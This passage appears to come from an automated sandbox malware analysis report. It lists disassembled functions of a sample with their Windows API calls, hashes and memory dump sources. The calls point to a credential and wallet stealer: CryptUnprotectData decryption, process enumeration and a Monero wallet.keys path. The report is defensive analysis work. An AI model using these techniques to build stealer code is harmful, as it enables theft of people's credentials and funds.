                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BA724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA7254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BA7281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BA72A4
                                  • LocalFree.KERNEL32(?), ref: 00BA72AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: f15c47fc2acf06db9d814134d8505359a632c05fe1ecd1ab57e4c0ab885a9380
                                  • Instruction ID: 1626efe96074a0bb64d6209372ae0b463e54fe9239ba93b195dd16235d31ceba
                                  • Opcode Fuzzy Hash: f15c47fc2acf06db9d814134d8505359a632c05fe1ecd1ab57e4c0ab885a9380
                                  • Instruction Fuzzy Hash: 96010075A44309BBDB10EBD8CD89F9D77B8EB44700F104159FB05EA2C0DA70BA008B65
                                  Function 00BB9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB961E
                                  • Process32First.KERNEL32(00BC0ACA,00000128), ref: 00BB9632
                                  • Process32Next.KERNEL32(00BC0ACA,00000128), ref: 00BB9647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00BB965C
                                  • CloseHandle.KERNEL32(00BC0ACA), ref: 00BB967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: dafc1b067660be51056617d7986e69795de2c395be09c7dda380dfac58fdc791
                                  • Instruction ID: 20c83777f69a116c5c91995a28974e3bba222900eaa6652309357437d5ad47a8
                                  • Opcode Fuzzy Hash: dafc1b067660be51056617d7986e69795de2c395be09c7dda380dfac58fdc791
                                  • Instruction Fuzzy Hash: D7010075A00309ABDB14EFA5CDC4BEDBBF8EB48300F1041C8A90AD6240D774AB40CF61
                                  Function 00F8126E Relevance: 7.5, Strings: 5, Instructions: 1230COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: APh_$a!s_$fro~$w54$|y3
                                  • API String ID: 0-221025883
                                  • Opcode ID: e8e7c9fc036da7b91911bda31eef9b540d721ebb0ec2f18fff048f8747c833ac
                                  • Instruction ID: 297b113f3a2e167d82d16ef889a88dd869624d57c11c412c0e8f52e1bc7f01c1
                                  • Opcode Fuzzy Hash: e8e7c9fc036da7b91911bda31eef9b540d721ebb0ec2f18fff048f8747c833ac
                                  • Instruction Fuzzy Hash: E18239F3A082049FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C3744E57598058697
                                  Function 00BB8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BC05B7), ref: 00BB86CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00BB86DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00BB86F3
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • CloseHandle.KERNEL32(?), ref: 00BB8761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 826a037ead6826f696c3120bbd26a2ef838de3afd2f05e5f26bc2712d769810d
                                  • Instruction ID: 2d4a364344ea12089ec6d5afb7bf6ce8bfdfc0b1bac3cd5aea973fa30e4b25fd
                                  • Opcode Fuzzy Hash: 826a037ead6826f696c3120bbd26a2ef838de3afd2f05e5f26bc2712d769810d
                                  • Instruction Fuzzy Hash: 19314B71901218ABCB24EF95CC95FEEB7B8EF45700F1041D9E10AA62A0DFB06E45CFA1
                                  Function 00BB8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00BA5184,40000001,00000000,00000000,?,00BA5184), ref: 00BB8EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 17fe3ed6e826bb87ef9ea19d35d086a92ed98f6bf28b4241dadbdc2bfbfdea57
                                  • Instruction ID: 55de36bf48360342f1311e2a092c2d27ad4e2cb040f65ed7ee58a8c93027d6ce
                                  • Opcode Fuzzy Hash: 17fe3ed6e826bb87ef9ea19d35d086a92ed98f6bf28b4241dadbdc2bfbfdea57
                                  • Instruction Fuzzy Hash: CF11F270200609AFDB00DF68E884FBA37EDAF89300F109888F9198F250DBB5E841DB60
                                  Function 00BA9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 9b607f45513cbd8ae8fba170e644648fec1b7e37b7c15ce17cece760b604dfbe
                                  • Instruction ID: 5c7c721f200a5706a275f0cb236460e592eacafd59dbd9895a3f39d6bea94db4
                                  • Opcode Fuzzy Hash: 9b607f45513cbd8ae8fba170e644648fec1b7e37b7c15ce17cece760b604dfbe
                                  • Instruction Fuzzy Hash: 991190B4240309AFEB10DF64DC95FAA77B5EB89700F208098F9159F390C7B6A941DBA0
                                  Function 00BB7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0E00,00000000,?), ref: 00BB79B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB79B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00BC0E00,00000000,?), ref: 00BB79C4
                                  • wsprintfA.USER32 ref: 00BB79F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d6d71570f3d7d8feecacc35fc76752bab3436048e077514a15165722a54bda06
                                  • Instruction ID: 6daf51463b3fb115ba87a22f4b081d160cdedad0fc2fe4f55f792fafeda33ac0
                                  • Opcode Fuzzy Hash: d6d71570f3d7d8feecacc35fc76752bab3436048e077514a15165722a54bda06
                                  • Instruction Fuzzy Hash: 45113CB2904259ABCB14DFC9DD85BBEB7F8FB4CB11F10415AF605A2280E7795940C7B1
                                  Function 00BB7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01410658,00000000,?,00BC0E10,00000000,?,00000000,00000000), ref: 00BB7A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01410658,00000000,?,00BC0E10,00000000,?,00000000,00000000,?), ref: 00BB7A7D
                                  • wsprintfA.USER32 ref: 00BB7AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 0788e55f8e4b9c1238b8e387fb6838736701c26df29101bdc542480bfc8b5507
                                  • Instruction ID: fa9f177973794a7c2afd7bec553188ea0103ac4c344a6dfc005160e32d3ff100
                                  • Opcode Fuzzy Hash: 0788e55f8e4b9c1238b8e387fb6838736701c26df29101bdc542480bfc8b5507
                                  • Instruction Fuzzy Hash: C81182B1945218DBDB209F58DC85FA9BBB8F744711F1043DAE506972D0D7742E40CF51
                                  Function 00BB3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00BBE118,00000000,00000001,00BBE108,00000000), ref: 00BB3758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BB37B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: bf4fbc8bf34c453c393c5bb866d6edff7529d121d477360627929daa8e4807dd
                                  • Instruction ID: 1b8f7eff6ccf6faa401f9b282f7a668334da87aec9e15f3704b6657da02e7f47
                                  • Opcode Fuzzy Hash: bf4fbc8bf34c453c393c5bb866d6edff7529d121d477360627929daa8e4807dd
                                  • Instruction Fuzzy Hash: A5411B70A40A189FDB24DB58CC94BDBB7B4BB48702F4041D8E608E72D0D7B1AE85CF50
                                  Function 00BA9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA9B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BA9BA3
                                  • LocalFree.KERNEL32(?), ref: 00BA9BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: a72fccc323b667948166cd1c2ae4f00236fa5235ba010daf93eca867b9872bba
                                  • Instruction ID: 1aa8aeb3e5459a8d3d29a939da14a6e76e95893c041c2499c4905f33be0c204f
                                  • Opcode Fuzzy Hash: a72fccc323b667948166cd1c2ae4f00236fa5235ba010daf93eca867b9872bba
                                  • Instruction Fuzzy Hash: 1C11A5B8A00209EFDB04DF98D985AAE77B5FB89304F104598E915AB350D770AE50CFB1
                                  Function 00F753C4 Relevance: 2.8, Strings: 1, Instructions: 1565COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
